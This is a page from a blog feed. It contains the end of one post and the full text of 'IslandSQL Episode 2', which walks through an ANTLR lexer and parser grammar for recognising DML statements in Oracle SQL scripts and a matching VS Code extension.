I plan to extend the IslandSQL grammar step by step and blog about the progress. At some point it will be necessary to move the logic from the lexer to the parser. Before that, I’ll be working on the lexer side a bit longer.

Adding the missing DML statements to the grammar will be the next item on my to-do list.

Another topic is utPLSQL. The utPLSQL annotations in package specifications could be easily parsed with a dedicated island grammar. We could visualise test suite hierarchies in the IDE and also consider tags. Of course, we would duplicate some of utPLSQL’s code in the database. The advantage of such an approach is that we know where a test package is located in the file system. This helps in navigating to the right place, e.g. after test execution failures and could greatly improve the experience of file-based development (compared to SQL Developer). I am looking forward to the next generation of SQL Developer based on VS Codium, where such an extension would bring the most value.

The post IslandSQL Episode 1: Select Statement appeared first on Philipp Salvisberg's Blog.

IslandSQL Episode 2: All DML Statements

$
0
0

Introduction

In the last episode we build the initial version of IslandSQL. An Island grammar for SQL scripts covering select statements. In this blog post we extend the grammar to handle the remaining DML statements.

The full source code is available on GitHub and the binaries on Maven Central.

Lexer Changes

The lexer grammar contains a new fragment COMMENT_OR_WS on line 98. We use this fragment in all DML lexer rules after the starting keywords. Why? Because we can use comments beside whitespace after a keyword as in with/*comment*/function e_count.... The previous lexer version required a whitespace after the with keyword for select statements with a plsql_declarations clause.

I also merged the former PLSQL_DECLARATION rule into the SELECT rule. Mainly to have a single lexer rule for all DML statements. It’s more consistent and easier to understand IMO.

lexer grammar IslandSqlLexer;

options {
    superClass=IslandSqlLexerBase;
    caseInsensitive = true;
}

/*----------------------------------------------------------------------------*/
// Comments and alike to be ignored
/*----------------------------------------------------------------------------*/

ML_COMMENT: '/*' .*? '*/' -> channel(HIDDEN);
SL_COMMENT: '--' .*? (EOF|SINGLE_NL) -> channel(HIDDEN);

REMARK_COMMAND:
    {isBeginOfCommand()}? 'rem' ('a' ('r' 'k'?)?)?
        (WS SQLPLUS_TEXT*)? SQLPLUS_END -> channel(HIDDEN)
;

PROMPT_COMMAND:
    {isBeginOfCommand()}? 'pro' ('m' ('p' 't'?)?)?
       (WS SQLPLUS_TEXT*)? SQLPLUS_END -> channel(HIDDEN)
;

STRING:
    'n'?
    (
          (['] .*? ['])+
        | ('q' ['] '[' .*? ']' ['])
        | ('q' ['] '(' .*? ')' ['])
        | ('q' ['] '{' .*? '}' ['])
        | ('q' ['] '<' .*? '>' ['])
        | ('q' ['] . {saveQuoteDelimiter1()}? .+? . ['] {checkQuoteDelimiter2()}?)
    ) -> channel(HIDDEN)
;

CONDITIONAL_COMPILATION_DIRECTIVE: '$if' .*? '$end' -> channel(HIDDEN);

/*----------------------------------------------------------------------------*/
// Islands of interest on DEFAULT_CHANNEL
/*----------------------------------------------------------------------------*/

CALL:
    {isBeginOfStatement()}? 'call' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

DELETE:
    {isBeginOfStatement()}? 'delete' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

EXPLAIN_PLAN:
    {isBeginOfStatement()}? 'explain' COMMENT_OR_WS+ 'plan' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

INSERT:
    {isBeginOfStatement()}? 'insert' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

LOCK_TABLE:
    {isBeginOfStatement()}? 'lock' COMMENT_OR_WS+ 'table' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

MERGE:
    {isBeginOfStatement()}? 'merge' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

UPDATE:
    {isBeginOfStatement()}? 'update' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

SELECT:
    {isBeginOfStatement()}?
    (
          ('with' COMMENT_OR_WS+ ('function'|'procedure') SQL_TEXT+? PLSQL_DECLARATION_END)
        | ('with' COMMENT_OR_WS+ SQL_TEXT+? SQL_END)
        | (('(' COMMENT_OR_WS*)* 'select' COMMENT_OR_WS SQL_TEXT+? SQL_END)
    )
;

/*----------------------------------------------------------------------------*/
// Whitespace
/*----------------------------------------------------------------------------*/

WS: [ \t\r\n]+ -> channel(HIDDEN);

/*----------------------------------------------------------------------------*/
// Any other token
/*----------------------------------------------------------------------------*/

ANY_OTHER: . -> channel(HIDDEN);

/*----------------------------------------------------------------------------*/
// Fragments to name expressions and reduce code duplication
/*----------------------------------------------------------------------------*/

fragment SINGLE_NL: '\r'? '\n';
fragment CONTINUE_LINE: '-' [ \t]* SINGLE_NL;
fragment COMMENT_OR_WS: ML_COMMENT|SL_COMMENT|WS;
fragment SQLPLUS_TEXT: (~[\r\n]|CONTINUE_LINE);
fragment SQL_TEXT: (ML_COMMENT|SL_COMMENT|STRING|.);
fragment SLASH_END: SINGLE_NL WS* '/' [ \t]* (EOF|SINGLE_NL);
fragment PLSQL_DECLARATION_END: ';'? [ \t]* (EOF|SLASH_END);
fragment SQL_END:
      EOF
    | (';' [ \t]* SINGLE_NL?)
    | SLASH_END
;
fragment SQLPLUS_END: EOF|SINGLE_NL;

Parser Changes

The start rule file on line 11 in the parser grammar is now defined as a unbounded number of dmlStatment. Each DML statement is a single lexer token. It’s still not possible to produce a parse error with this grammar. We only process DML statements. Everything else is hidden and therefore ignored.

parser grammar IslandSqlParser;

options {
    tokenVocab=IslandSqlLexer;
}

/*----------------------------------------------------------------------------*/
// Start rule
/*----------------------------------------------------------------------------*/

file: dmlStatement* EOF;

/*----------------------------------------------------------------------------*/
// Rules for reduced SQL grammar (islands of interest)
/*----------------------------------------------------------------------------*/

dmlStatement:
      callStatement
    | deleteStatement
    | explainPlanStatement
    | insertStatement
    | lockTableStatement
    | mergeStatement
    | selectStatement
    | updateStatement
;

callStatement: CALL;
deleteStatement: DELETE;
explainPlanStatement: EXPLAIN_PLAN;
insertStatement: INSERT;
lockTableStatement: LOCK_TABLE;
mergeStatement: MERGE;
updateStatement: UPDATE;
selectStatement: SELECT;

IslandSQL for VS Code

The extension for Visual Studio Code version 0.2.0 finds text in all DML statements and is not limited to select statements anymore. And a symbol for each DML statement is shown now in the outline view.

Outlook

A grammar that can parse all DML statements sounds like something complete. However, this grammar is far from complete. For code analysis, getting a single token for a DML statement is at best a good starting point.

What we need is a more detailed result. For this, we need to move the logic from the lexer to the parser. In the next episode we will do this with one of the DML statements.

The post IslandSQL Episode 2: All DML Statements appeared first on Philipp Salvisberg's Blog.

Viewing all 118 articles
Browse latest View live